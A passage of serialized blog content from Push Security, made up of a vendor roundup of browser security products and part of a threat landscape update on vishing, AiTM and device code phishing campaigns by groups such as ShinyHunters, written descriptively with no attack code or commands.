happening in the browser. That makes it the perfect place to detect and respond to these attacks. But right now, the browser is a blind-spot for most security teams — ",[],{},{"nodeType":791,"data":1784,"content":1785},{"uri":793},[1786],{"nodeType":699,"value":1787,"marks":1788,"data":1789},"according to Omdia",[],{},{"nodeType":699,"value":1791,"marks":1792,"data":1793},", 49% of organizations suffered a successful browser-based attack in the last 12 months, and browser security is now a top-five priority for 88% of organizations. ",[],{},{"nodeType":695,"data":1795,"content":1796},{},[1797],{"nodeType":699,"value":909,"marks":1798,"data":1799},[],{},{"nodeType":695,"data":1801,"content":1802},{},[1803],{"nodeType":699,"value":916,"marks":1804,"data":1805},[],{},{"nodeType":695,"data":1807,"content":1808},{},[1809,1813,1821],{"nodeType":699,"value":1810,"marks":1811,"data":1812},"If you want to learn more about how Push helps you to detect and stop attacks in the browser, ",[],{},{"nodeType":791,"data":1814,"content":1815},{"uri":927},[1816],{"nodeType":699,"value":1817,"marks":1818,"data":1820},"book some time with one of our team for a live demo",[1819],{"type":799},{},{"nodeType":699,"value":1407,"marks":1822,"data":1823},[],{},"6 browser-based attacks every security team should be prepared for","What security teams need to know about the browser-based attack techniques that are the leading cause of breaches.","2026-09-15T00:00:00.000Z","6-browser-based-attacks-every-security-team-should-be-prepared-for",{"items":1829},[1830,1834],{"sys":1831,"name":1833},{"id":1832},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1835,"name":1837},{"id":1836},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":1839},[1840],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":1844},"Dan Green","Dan","Threat Research",{"url":1845},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F7jik1VhFgA3kgzXBXTm2Vw\u002Ffcd8c171da644903d0827eafcfbcaad0\u002FDan_Headshot_2025.png",{"__typename":952,"sys":1847,"content":1849,"title":2322,"synopsis":2323,"hashTags":60,"publishedDate":2324,"slug":2325,"tagsCollection":2326,"authorsCollection":2334},{"id":1848},"ThcZepauVfA5fKossdkbm",{"json":1850},{"data":1851,"content":1852,"nodeType":691},{},[1853,1860,1867,1897,1904,1912,1918,1921,1929,1972,1992,1998,2001,2009,2016,2035,2038,2046,2053,2060,2063,2071,2078,2085,2088,2096,2103,2121,2124,2132,2139,2146,2149,2157,2164,2171,2174,2182,2201,2204,2212,2219,2226,2232,2235,2243,2250,2257,2260,2268,2274,2292,2298,2304],{"data":1854,"content":1855,"nodeType":695},{},[1856],{"data":1857,"marks":1858,"value":1859,"nodeType":699},{},[],"Ask a security team where most of their tools are and it's the endpoint, network, or cloud. But ask where their users spend most of their time and it's the browser.",{"data":1861,"content":1862,"nodeType":695},{},[1863],{"data":1864,"marks":1865,"value":1866,"nodeType":699},{},[],"So we got a category: browser security. And when it comes to the best browser security tools, there's a problem. Browser security means three different things depending on who's talking: enterprise browser extensions, enterprise browsers, and remote browser isolation (RBI).",{"data":1868,"content":1869,"nodeType":695},{},[1870,1874,1881,1885,1893],{"data":1871,"marks":1872,"value":1873,"nodeType":699},{},[],"The market reflects that confusion, but the momentum is real. According to ",{"data":1875,"content":1876,"nodeType":791},{"uri":793},[1877],{"data":1878,"marks":1879,"value":1880,"nodeType":699},{},[],"Omdia's 2026 research",{"data":1882,"marks":1883,"value":1884,"nodeType":699},{},[],", browser security is already a top-five priority for 88% of organizations and the top priority for 26%, with 86% having meaningfully increased their browser security spending in response to emerging threats. ",{"data":1886,"content":1888,"nodeType":791},{"uri":1887},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-case-for-best-of-breed-browser-security",[1889],{"data":1890,"marks":1891,"value":1892,"nodeType":699},{},[],"Three browser security startups were acquired",{"data":1894,"marks":1895,"value":1896,"nodeType":699},{},[]," by major platform vendors in 2026 alone — CrowdStrike bought Seraphic, Zscaler absorbed SquareX, and Akamai announced intent to acquire LayerX.",{"data":1898,"content":1899,"nodeType":695},{},[1900],{"data":1901,"marks":1902,"value":1903,"nodeType":699},{},[],"Here's what the browser security market looks like in 2026.",{"data":1905,"content":1906,"nodeType":695},{},[1907],{"data":1908,"marks":1909,"value":1911,"nodeType":699},{},[1910],{"type":707},"The top enterprise browser solutions in 2026 include Push Security, Island, and LayerX.",{"data":1913,"content":1917,"nodeType":1041},{"target":1914},{"sys":1915},{"id":1916,"type":1046,"linkType":1047},"5d35fpWpgIytQhhiABQray",[],{"data":1919,"content":1920,"nodeType":721},{},[],{"data":1922,"content":1923,"nodeType":725},{},[1924],{"data":1925,"marks":1926,"value":1928,"nodeType":699},{},[1927],{"type":707},"1. Push Security – Enterprise browser extension",{"data":1930,"content":1931,"nodeType":695},{},[1932,1936,1944,1948,1956,1960,1968],{"data":1933,"marks":1934,"value":1935,"nodeType":699},{},[],"Push is a browser extension, not a browser, that turns whatever browser your people already use into a detection and response platform for the security team. With no migration, no user disruption, no new browser to manage. It covers ",{"data":1937,"content":1939,"nodeType":791},{"uri":1938},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-top-10-security-problems-you-can-solve-in-the-browser-ranked-by-value",[1940],{"data":1941,"marks":1942,"value":1943,"nodeType":699},{},[],"four use cases from a single deployment",{"data":1945,"marks":1946,"value":1947,"nodeType":699},{},[],": detecting and stopping sophisticated browser-based attacks, AI visibility and control, identity and shadow IT security, and DLP and insider investigations. Detections are built on ",{"data":1949,"content":1951,"nodeType":791},{"uri":1950},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-to-avoid-the-browser-security-buyers-trap",[1952],{"data":1953,"marks":1954,"value":1955,"nodeType":699},{},[],"in-house threat research",{"data":1957,"marks":1958,"value":1959,"nodeType":699},{},[]," and operationalized by autonomous agents, so what Push catches is based on attacker techniques and behaviors rather than a blocklist. It ",{"data":1961,"content":1963,"nodeType":791},{"uri":1962},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmaking-the-business-case-for-a-browser-security-solution",[1964],{"data":1965,"marks":1966,"value":1967,"nodeType":699},{},[],"deploys in minutes",{"data":1969,"marks":1970,"value":1971,"nodeType":699},{},[]," across managed and unmanaged devices.",{"data":1973,"content":1974,"nodeType":695},{},[1975,1979,1988],{"data":1976,"marks":1977,"value":1978,"nodeType":699},{},[],"Push detects AiTM and device code phishing kits (",{"data":1980,"content":1982,"nodeType":791},{"uri":1981},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fagentic-threat-hunting-benefits-for-customers",[1983],{"data":1984,"marks":1985,"value":1987,"nodeType":699},{},[1986],{"type":799},"75+ across Tycoon 2FA, Sneaky 2FA, Evilginx, and many others",{"data":1989,"marks":1990,"value":1991,"nodeType":699},{},[],") behaviorally by analyzing page structure and script execution — so detection survives infrastructure rotation. It catches ClickFix-style clipboard injection before the payload executes, detects stolen session tokens via marker injection when they appear in uninstrumented browsers, and monitors OAuth consent flows across 20+ authorization servers. Push is deployed across 3 million browsers worldwide and has been rolled out to 100,000 users in under one hour during normal office hours.",{"data":1993,"content":1997,"nodeType":1041},{"target":1994},{"sys":1995},{"id":1996,"type":1046,"linkType":1047},"ZmRwtfBPVptxTOE6wt1Yq",[],{"data":1999,"content":2000,"nodeType":721},{},[],{"data":2002,"content":2003,"nodeType":725},{},[2004],{"data":2005,"marks":2006,"value":2008,"nodeType":699},{},[2007],{"type":707},"2. Island – Enterprise browser",{"data":2010,"content":2011,"nodeType":695},{},[2012],{"data":2013,"marks":2014,"value":2015,"nodeType":699},{},[],"Island was one of the first to market in the enterprise browser category and still defines it. It replaces current browsers with a managed Chromium fork that gives IT granular control over copy-paste, screenshots, downloads, session recording, and application access — all enforced at the browser level without routing traffic through a proxy. For highly regulated environments where that degree of governance is a requirement, it's a capable platform with real enterprise traction.",{"data":2017,"content":2018,"nodeType":695},{},[2019,2023,2032],{"data":2020,"marks":2021,"value":2022,"nodeType":699},{},[],"It's a full browser replacement, with primary use cases around VDI replacement, contractor access, BYOD governance, and zero-trust network access. Most organizations plan for a ",{"data":2024,"content":2026,"nodeType":791},{"uri":2025},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fenterprise-browser-vs-browser-extension-which-should-your-security-team-choose",[2027],{"data":2028,"marks":2029,"value":2031,"nodeType":699},{},[2030],{"type":799},"phased rollout",{"data":2033,"marks":2034,"value":1407,"nodeType":699},{},[],{"data":2036,"content":2037,"nodeType":721},{},[],{"data":2039,"content":2040,"nodeType":725},{},[2041],{"data":2042,"marks":2043,"value":2045,"nodeType":699},{},[2044],{"type":707},"3. Prisma Browser – Enterprise browser",{"data":2047,"content":2048,"nodeType":695},{},[2049],{"data":2050,"marks":2051,"value":2052,"nodeType":699},{},[],"Formerly Talon, now Palo Alto Networks' enterprise browser and the last-mile enforcement layer of its SASE platform. Prisma Browser is a managed Chromium browser with DLP that inspects the rendered page and zero-trust access controls, designed primarily for contractor, BYOD, and remote worker populations accessing corporate apps from unmanaged devices.",{"data":2054,"content":2055,"nodeType":695},{},[2056],{"data":2057,"marks":2058,"value":2059,"nodeType":699},{},[],"Like Island, it's a browser replacement. It integrates natively with the broader Prisma Access and Cortex stack, feeding browser telemetry into Palo Alto Networks' existing correlation and response workflows.",{"data":2061,"content":2062,"nodeType":721},{},[],{"data":2064,"content":2065,"nodeType":725},{},[2066],{"data":2067,"marks":2068,"value":2070,"nodeType":699},{},[2069],{"type":707},"4. Seraphic Security (CrowdStrike) – Enterprise browser extension",{"data":2072,"content":2073,"nodeType":695},{},[2074],{"data":2075,"marks":2076,"value":2077,"nodeType":699},{},[],"Seraphic works across any browser through an endpoint agent that adds enterprise security without replacing what's deployed. CrowdStrike acquired Seraphic in early 2026 to extend Falcon past the endpoint and into the browser layer, with the stated goal of correlating endpoint and browser telemetry in a single platform.",{"data":2079,"content":2080,"nodeType":695},{},[2081],{"data":2082,"marks":2083,"value":2084,"nodeType":699},{},[],"For existing CrowdStrike customers, the extension into the browser is a natural addition to the Falcon ecosystem. Cross-browser coverage remains a differentiator for mixed environments.",{"data":2086,"content":2087,"nodeType":721},{},[],{"data":2089,"content":2090,"nodeType":725},{},[2091],{"data":2092,"marks":2093,"value":2095,"nodeType":699},{},[2094],{"type":707},"5. LayerX Security (Akamai) – Enterprise browser extension",{"data":2097,"content":2098,"nodeType":695},{},[2099],{"data":2100,"marks":2101,"value":2102,"nodeType":699},{},[],"LayerX is extension-based, focused on real-time DLP and AI governance which captures what happens inside AI tools, flagging sensitive data submissions, and enforcing policy, all without requiring a new browser. Low deployment friction and a growing AI visibility capability are the draw.",{"data":2104,"content":2105,"nodeType":695},{},[2106,2110,2117],{"data":2107,"marks":2108,"value":2109,"nodeType":699},{},[],"Akamai announced the intent to acquire LayerX in mid-2026 to complement its Zero Trust portfolio. For buyers evaluating LayerX as a long-term platform bet, the ",{"data":2111,"content":2112,"nodeType":791},{"uri":1887},[2113],{"data":2114,"marks":2115,"value":2116,"nodeType":699},{},[],"question is what the roadmap looks like 18 months post-close",{"data":2118,"marks":2119,"value":2120,"nodeType":699},{},[],", given Akamai's track record of absorbing acquisitions (Guardicore, Neosec, Inverse) into its broader platform.",{"data":2122,"content":2123,"nodeType":721},{},[],{"data":2125,"content":2126,"nodeType":725},{},[2127],{"data":2128,"marks":2129,"value":2131,"nodeType":699},{},[2130],{"type":707},"6. SquareX (Zscaler) – Enterprise browser extension",{"data":2133,"content":2134,"nodeType":695},{},[2135],{"data":2136,"marks":2137,"value":2138,"nodeType":699},{},[],"SquareX takes a detection-minded posture, inspecting files and links while browsing, neutralizing malicious content before it reaches the endpoint, and offering disposable browser environments for high-risk activity. It was clearly built by people who think in attacker terms.",{"data":2140,"content":2141,"nodeType":695},{},[2142],{"data":2143,"marks":2144,"value":2145,"nodeType":699},{},[],"Zscaler acquired SquareX in early 2026, integrating it into the Zero Trust Exchange alongside its existing SSE capabilities.",{"data":2147,"content":2148,"nodeType":721},{},[],{"data":2150,"content":2151,"nodeType":725},{},[2152],{"data":2153,"marks":2154,"value":2156,"nodeType":699},{},[2155],{"type":707},"7. Keep Aware – Enterprise browser extension",{"data":2158,"content":2159,"nodeType":695},{},[2160],{"data":2161,"marks":2162,"value":2163,"nodeType":699},{},[],"Keep Aware is an agentless extension built with security operations in mind. It's quick to deploy through MDM or group policy, and focused on surfacing browser threats, extension risk, and AI usage into existing SOC workflows. Detection and response is the throughline, with SIEM integration as a core part of the offering.",{"data":2165,"content":2166,"nodeType":695},{},[2167],{"data":2168,"marks":2169,"value":2170,"nodeType":699},{},[],"Founded in 2022, Keep Aware has been iterating quickly with a focused product roadmap around browser detection and response.",{"data":2172,"content":2173,"nodeType":721},{},[],{"data":2175,"content":2176,"nodeType":725},{},[2177],{"data":2178,"marks":2179,"value":2181,"nodeType":699},{},[2180],{"type":707},"8. Menlo Security – Remote browser isolation",{"data":2183,"content":2184,"nodeType":695},{},[2185,2189,2197],{"data":2186,"marks":2187,"value":2188,"nodeType":699},{},[],"Menlo pioneered ",{"data":2190,"content":2192,"nodeType":791},{"uri":2191},"https:\u002F\u002Fpushsecurity.com\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation",[2193],{"data":2194,"marks":2195,"value":2196,"nodeType":699},{},[],"remote browser isolation",{"data":2198,"marks":2199,"value":2200,"nodeType":699},{},[],": web content renders in a disposable cloud container and the user receives a clean visual stream, so nothing malicious ever touches the endpoint. For zero-tolerance environments and third-party or contractor access where you don't fully trust the device, the approach has a solid track record. Cloud rendering introduces latency and the occasional site-compatibility issue, though Menlo has invested in reducing both over the years.",{"data":2202,"content":2203,"nodeType":721},{},[],{"data":2205,"content":2206,"nodeType":725},{},[2207],{"data":2208,"marks":2209,"value":2211,"nodeType":699},{},[2210],{"type":707},"9. Chrome Enterprise \u002F Edge for Business – Enterprise browser",{"data":2213,"content":2214,"nodeType":695},{},[2215],{"data":2216,"marks":2217,"value":2218,"nodeType":699},{},[],"The security controls are already built into the browsers most of your people use. Chrome Enterprise offers centralized management, Safe Browsing, and identity tool integration across the fleet; Edge for Business adds work-and-personal separation, phishing protection, and tight integration with Microsoft 365 and Defender.",{"data":2220,"content":2221,"nodeType":695},{},[2222],{"data":2223,"marks":2224,"value":2225,"nodeType":699},{},[],"These are baseline controls, and for many organizations they're effectively free with what's already deployed. Most organizations treat them as the foundation that the rest of the tools on this list build on.",{"data":2227,"content":2231,"nodeType":1041},{"target":2228},{"sys":2229},{"id":2230,"type":1046,"linkType":1047},"7Gbd8bBWa19gP5DMfeeB7J",[],{"data":2233,"content":2234,"nodeType":721},{},[],{"data":2236,"content":2237,"nodeType":725},{},[2238],{"data":2239,"marks":2240,"value":2242,"nodeType":699},{},[2241],{"type":707},"10. SURF Security – Enterprise browser",{"data":2244,"content":2245,"nodeType":695},{},[2246],{"data":2247,"marks":2248,"value":2249,"nodeType":699},{},[],"SURF is a Chromium-based enterprise browser built zero-trust-first, with identity-based access controls, DLP, and session security inside a fully managed environment. Centralized, policy-driven control by default is the pitch, aimed at security-first organizations that want a locked-down browser from day one.",{"data":2251,"content":2252,"nodeType":695},{},[2253],{"data":2254,"marks":2255,"value":2256,"nodeType":699},{},[],"Like Island and Prisma, it's a browser replacement, so it follows the same deployment model — plan for a migration alongside the capabilities.",{"data":2258,"content":2259,"nodeType":721},{},[],{"data":2261,"content":2262,"nodeType":725},{},[2263],{"data":2264,"marks":2265,"value":2267,"nodeType":699},{},[2266],{"type":707},"Learn more about Push Security",{"data":2269,"content":2270,"nodeType":695},{},[2271],{"data":2272,"marks":2273,"value":909,"nodeType":699},{},[],{"data":2275,"content":2276,"nodeType":695},{},[2277,2281,2288],{"data":2278,"marks":2279,"value":2280,"nodeType":699},{},[],"Push is the best choice for organizations looking to ",{"data":2282,"content":2283,"nodeType":791},{"uri":1938},[2284],{"data":2285,"marks":2286,"value":2287,"nodeType":699},{},[],"solve the most impactful security problems in the browse",{"data":2289,"marks":2290,"value":2291,"nodeType":699},{},[],"r, with use cases including detecting and stopping advanced attacks, data loss and insider investigations, identity and shadow IT security, and AI visibility and control. ",{"data":2293,"content":2297,"nodeType":1041},{"target":2294},{"sys":2295},{"id":2296,"type":1046,"linkType":1047},"4nGzT9cNG0Yid93uUCCuTt",[],{"data":2299,"content":2300,"nodeType":695},{},[2301],{"data":2302,"marks":2303,"value":916,"nodeType":699},{},[],{"data":2305,"content":2306,"nodeType":695},{},[2307,2311,2318],{"data":2308,"marks":2309,"value":2310,"nodeType":699},{},[],"Book a ",{"data":2312,"content":2313,"nodeType":791},{"uri":927},[2314],{"data":2315,"marks":2316,"value":2317,"nodeType":699},{},[],"live demo",{"data":2319,"marks":2320,"value":2321,"nodeType":699},{},[]," to learn more.","The top 10 browser security solutions: Push Security, Island, LayerX and more","Browser security means a lot of different things depending on who's talking. Here's your guide to the browser security market from a vendor perspective in 2026.","2026-07-27T00:00:00.000Z","the-top-10-browser-security-solutions-in-2026",{"items":2327},[2328,2332],{"sys":2329,"name":2331},{"id":2330},"3pjES4THCIfSAwhGdNwBcy","Browser security",{"sys":2333,"name":1837},{"id":1836},{"items":2335},[2336],{"fullName":2337,"firstName":2338,"jobTitle":2339,"profilePicture":2340},"Alex Henshall","Alex","Product Team",{"url":2341},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2rz3Pre3b1MexPIQ4hzPUe\u002F0ef8a092b7e7df00fbce3f7d1ccb96d1\u002FAlex_Henshall.jpeg",{"__typename":952,"sys":2343,"content":2345,"title":3638,"synopsis":3639,"hashTags":60,"publishedDate":3640,"slug":3641,"tagsCollection":3642,"authorsCollection":3648},{"id":2344},"vLb3RhwYt7Xc6mkX3pWyI",{"json":2346},{"data":2347,"content":2348,"nodeType":691},{},[2349,2356,2359,2367,2397,2405,2411,2442,2557,2598,2606,2661,2692,2698,2701,2709,2716,2724,2741,2796,2802,2809,2828,2834,2841,2847,2854,2860,2867,2873,2881,2924,2955,2974,3005,3013,3044,3075,3106,3114,3121,3140,3194,3225,3233,3251,3294,3297,3305,3312,3319,3337,3343,3350,3462,3504,3512,3531,3538,3541,3549,3556,3599,3606,3609,3615,3621],{"data":2350,"content":2351,"nodeType":695},{},[2352],{"data":2353,"marks":2354,"value":2355,"nodeType":699},{},[],"Feeling overwhelmed with the amount of cyber news stories? Tired of dodging AI vendors boasting about their agents escaping the lab? This threat landscape update cuts through the noise and covers the key developments that security teams need to be on top of.",{"data":2357,"content":2358,"nodeType":721},{},[],{"data":2360,"content":2361,"nodeType":725},{},[2362],{"data":2363,"marks":2364,"value":2366,"nodeType":699},{},[2365],{"type":707},"The SLH playbook becomes the industry standard",{"data":2368,"content":2369,"nodeType":695},{},[2370,2374,2382,2386,2393],{"data":2371,"marks":2372,"value":2373,"nodeType":699},{},[],"Criminals associated with \"The Com,\" broadly known as the ",{"data":2375,"content":2377,"nodeType":791},{"uri":2376},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-lapsus-hunters",[2378],{"data":2379,"marks":2380,"value":2381,"nodeType":699},{},[],"Scattered Lapsus$ Hunters",{"data":2383,"marks":2384,"value":2385,"nodeType":699},{},[]," collective, have spent the past three years establishing a playbook ",{"data":2387,"content":2388,"nodeType":791},{"uri":1030},[2389],{"data":2390,"marks":2391,"value":2392,"nodeType":699},{},[],"focused on identity compromise and cloud data theft",{"data":2394,"marks":2395,"value":2396,"nodeType":699},{},[]," for extortion. They've dominated the news when it comes to public breaches: a sign of their effectiveness, or perhaps more their desire for notoriety (something that has come back to bite individuals later with a series of arrests, but hasn't hampered the overall trajectory of the breaches).",{"data":2398,"content":2399,"nodeType":695},{},[2400],{"data":2401,"marks":2402,"value":2404,"nodeType":699},{},[2403],{"type":707},"Regardless, the data doesn't lie. Of the browser and identity-related breaches we've tracked, groups linked to \"The Com\" such as Scattered Spider, ShinyHunters, and Lapsus$ are responsible for roughly 70% (not just in 2026, but since the start of 2024). ",{"data":2406,"content":2410,"nodeType":1041},{"target":2407},{"sys":2408},{"id":2409,"type":1046,"linkType":1047},"3hODobO3VJr3LvbXkzso8I",[],{"data":2412,"content":2413,"nodeType":695},{},[2414,2418,2426,2430,2438],{"data":2415,"marks":2416,"value":2417,"nodeType":699},{},[],"The trump card of prolific criminal groups like Scattered Spider, Lapsus$, and ShinyHunters has always been their social engineering skill. Last year, they had huge success in ",{"data":2419,"content":2421,"nodeType":791},{"uri":2420},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-spider-defending-against-help-desk-scams",[2422],{"data":2423,"marks":2424,"value":2425,"nodeType":699},{},[],"tricking help desks into performing account resets",{"data":2427,"marks":2428,"value":2429,"nodeType":699},{},[],". This year, they've switched to using voice-based lures in tandem with ",{"data":2431,"content":2433,"nodeType":791},{"uri":2432},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-latest-slh-campaign",[2434],{"data":2435,"marks":2436,"value":2437,"nodeType":699},{},[],"browser-based phishing payloads",{"data":2439,"marks":2440,"value":2441,"nodeType":699},{},[]," — usually impersonating IT staff under the guise of \"setting up passkeys.\"",{"data":2443,"content":2444,"nodeType":695},{},[2445,2449,2457,2461,2469,2473,2481,2485,2493,2497,2505,2509,2517,2521,2529,2533,2541,2545,2553],{"data":2446,"marks":2447,"value":2448,"nodeType":699},{},[],"The vishing-to-SSO-takeover campaign has been prolific, running continuously since January: ",{"data":2450,"content":2452,"nodeType":791},{"uri":2451},"https:\u002F\u002Fwww.securityweek.com\u002Fpanera-bread-data-breach-linked-to-shinyhunters-sso-campaign\u002F",[2453],{"data":2454,"marks":2455,"value":2456,"nodeType":699},{},[],"Panera Bread",{"data":2458,"marks":2459,"value":2460,"nodeType":699},{},[]," (~14M records), ",{"data":2462,"content":2464,"nodeType":791},{"uri":2463},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fmatch-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match\u002F",[2465],{"data":2466,"marks":2467,"value":2468,"nodeType":699},{},[],"Match Group",{"data":2470,"marks":2471,"value":2472,"nodeType":699},{},[]," (Hinge, Tinder, OkCupid; 10M+ records), ",{"data":2474,"content":2476,"nodeType":791},{"uri":2475},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fexpansion-shinyhunters-saas-data-theft",[2477],{"data":2478,"marks":2479,"value":2480,"nodeType":699},{},[],"Betterment",{"data":2482,"marks":2483,"value":2484,"nodeType":699},{},[]," (~20M records), ",{"data":2486,"content":2488,"nodeType":791},{"uri":2487},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fshinyhunters-extortion-gang-claims-odido-breach-affecting-millions\u002F",[2489],{"data":2490,"marks":2491,"value":2492,"nodeType":699},{},[],"Odido",{"data":2494,"marks":2495,"value":2496,"nodeType":699},{},[]," (6.2M Dutch telecom customers with BSNs and IBANs exposed), ",{"data":2498,"content":2500,"nodeType":791},{"uri":2499},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fadt-confirms-data-breach-after-shinyhunters-leak-threat\u002F",[2501],{"data":2502,"marks":2503,"value":2504,"nodeType":699},{},[],"ADT",{"data":2506,"marks":2507,"value":2508,"nodeType":699},{},[]," (5.5M records), ",{"data":2510,"content":2512,"nodeType":791},{"uri":2511},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcharter-communications-data-breach-affects-49-million-accounts\u002F",[2513],{"data":2514,"marks":2515,"value":2516,"nodeType":699},{},[],"Charter Communications",{"data":2518,"marks":2519,"value":2520,"nodeType":699},{},[]," (4.9M accounts), ",{"data":2522,"content":2524,"nodeType":791},{"uri":2523},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F24\u002Fshinyhunters_claim_cruise_giant_carnivals\u002F",[2525],{"data":2526,"marks":2527,"value":2528,"nodeType":699},{},[],"Carnival Corporation",{"data":2530,"marks":2531,"value":2532,"nodeType":699},{},[]," (6M records), and",{"data":2534,"content":2536,"nodeType":791},{"uri":2535},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F28\u002Fpitney_bowes_is_the_latest\u002F",[2537],{"data":2538,"marks":2539,"value":2540,"nodeType":699},{},[]," Pitney Bowes",{"data":2542,"marks":2543,"value":2544,"nodeType":699},{},[]," (8.2M emails per HIBP). ",{"data":2546,"content":2548,"nodeType":791},{"uri":2547},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fad-tech-firm-optimizely-confirms-data-breach-after-vishing-attack\u002F",[2549],{"data":2550,"marks":2551,"value":2552,"nodeType":699},{},[],"Optimizely",{"data":2554,"marks":2555,"value":2556,"nodeType":699},{},[]," is notable as the first confirmed case where attackers deployed both AiTM credential harvesting and device code phishing against the same target.",{"data":2558,"content":2559,"nodeType":695},{},[2560,2564,2571,2575,2583,2587,2595],{"data":2561,"marks":2562,"value":2563,"nodeType":699},{},[],"Since mid-2025, SaaS apps like Salesforce have been a persistent target for data theft and extortion — as seen in the first large-scale criminal ",{"data":2565,"content":2566,"nodeType":791},{"uri":1355},[2567],{"data":2568,"marks":2569,"value":2570,"nodeType":699},{},[],"device code phishing",{"data":2572,"marks":2573,"value":2574,"nodeType":699},{},[]," campaign that preceded this year's adoption spike. ShinyHunters also led the way with OAuth supply chain abuse — compromising SaaS vendors like ",{"data":2576,"content":2578,"nodeType":791},{"uri":2577},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fdata-theft-salesforce-instances-via-salesloft-drift",[2579],{"data":2580,"marks":2581,"value":2582,"nodeType":699},{},[],"Salesloft, Drift, and GainSight",{"data":2584,"marks":2585,"value":2586,"nodeType":699},{},[]," and leveraging stored OAuth tokens to penetrate downstream customer environments, a pattern that has since ",{"data":2588,"content":2590,"nodeType":791},{"uri":2589},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach",[2591],{"data":2592,"marks":2593,"value":2594,"nodeType":699},{},[],"repeated at scale",{"data":2596,"marks":2597,"value":1407,"nodeType":699},{},[],{"data":2599,"content":2600,"nodeType":769},{},[2601],{"data":2602,"marks":2603,"value":2605,"nodeType":699},{},[2604],{"type":707},"Copycats and nation-state adoption",{"data":2607,"content":2608,"nodeType":695},{},[2609,2613,2621,2625,2633,2637,2645,2649,2657],{"data":2610,"marks":2611,"value":2612,"nodeType":699},{},[],"Wider groups are now running the SLH playbook independently. ",{"data":2614,"content":2616,"nodeType":791},{"uri":2615},"https:\u002F\u002Fhackread.com\u002Fpink-extortion-microsoft-365-cloud-data-vishing-scams\u002F",[2617],{"data":2618,"marks":2619,"value":2620,"nodeType":699},{},[],"Pink",{"data":2622,"marks":2623,"value":2624,"nodeType":699},{},[]," (the latest rebrand in the",{"data":2626,"content":2628,"nodeType":791},{"uri":2627},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Func6671-targets-financial-services-and-enterprise-cloud-environments",[2629],{"data":2630,"marks":2631,"value":2632,"nodeType":699},{},[]," BlackFile",{"data":2634,"marks":2635,"value":2636,"nodeType":699},{},[],"-Redact succession) runs vishing combined with passkey-themed credential phishing for M365 extortion. ",{"data":2638,"content":2640,"nodeType":791},{"uri":2639},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-helix-vishing-group-emerges-in-sharepoint-data-theft-attacks\u002F",[2641],{"data":2642,"marks":2643,"value":2644,"nodeType":699},{},[],"Helix",{"data":2646,"marks":2647,"value":2648,"nodeType":699},{},[]," also emerged shortly after BlackFile shut down, pairing vishing with device code phishing and MFA registration for persistence. ",{"data":2650,"content":2652,"nodeType":791},{"uri":2651},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fkongtuke-hackers-now-use-microsoft-teams-for-corporate-breaches\u002F",[2653],{"data":2654,"marks":2655,"value":2656,"nodeType":699},{},[],"KongTuke",{"data":2658,"marks":2659,"value":2660,"nodeType":699},{},[],", an independent initial access broker, adopted a similar help-desk impersonation model via Teams external messaging.",{"data":2662,"content":2663,"nodeType":695},{},[2664,2668,2676,2680,2688],{"data":2665,"marks":2666,"value":2667,"nodeType":699},{},[],"It's not just criminal groups either. Recently, we saw a campaign linked to Russian actors that used ",{"data":2669,"content":2671,"nodeType":791},{"uri":2670},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F07\u002F31\u002Fcaptivecrunch-midnight-blizzard-targets-travelers-worldwide-for-malware-delivery-and-credential-theft\u002F",[2672],{"data":2673,"marks":2674,"value":2675,"nodeType":699},{},[],"compromised hotel and conference Wi-Fi gateways",{"data":2677,"marks":2678,"value":2679,"nodeType":699},{},[]," to direct victims to AiTM, ClickFix, and device code phishing pages. And ",{"data":2681,"content":2683,"nodeType":791},{"uri":2682},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fchinese-language-phishing-services\u002F",[2684],{"data":2685,"marks":2686,"value":2687,"nodeType":699},{},[],"Google Threat Intelligence mapped",{"data":2689,"marks":2690,"value":2691,"nodeType":699},{},[]," a dozen Chinese-language PhaaS platforms with real-time MFA interception.",{"data":2693,"content":2697,"nodeType":1041},{"target":2694},{"sys":2695},{"id":2696,"type":1046,"linkType":1047},"6q2NwH6Q4DJE7RNeYheIvJ",[],{"data":2699,"content":2700,"nodeType":721},{},[],{"data":2702,"content":2703,"nodeType":725},{},[2704],{"data":2705,"marks":2706,"value":2708,"nodeType":699},{},[2707],{"type":707},"Phishing infrastructure has reached an industrial 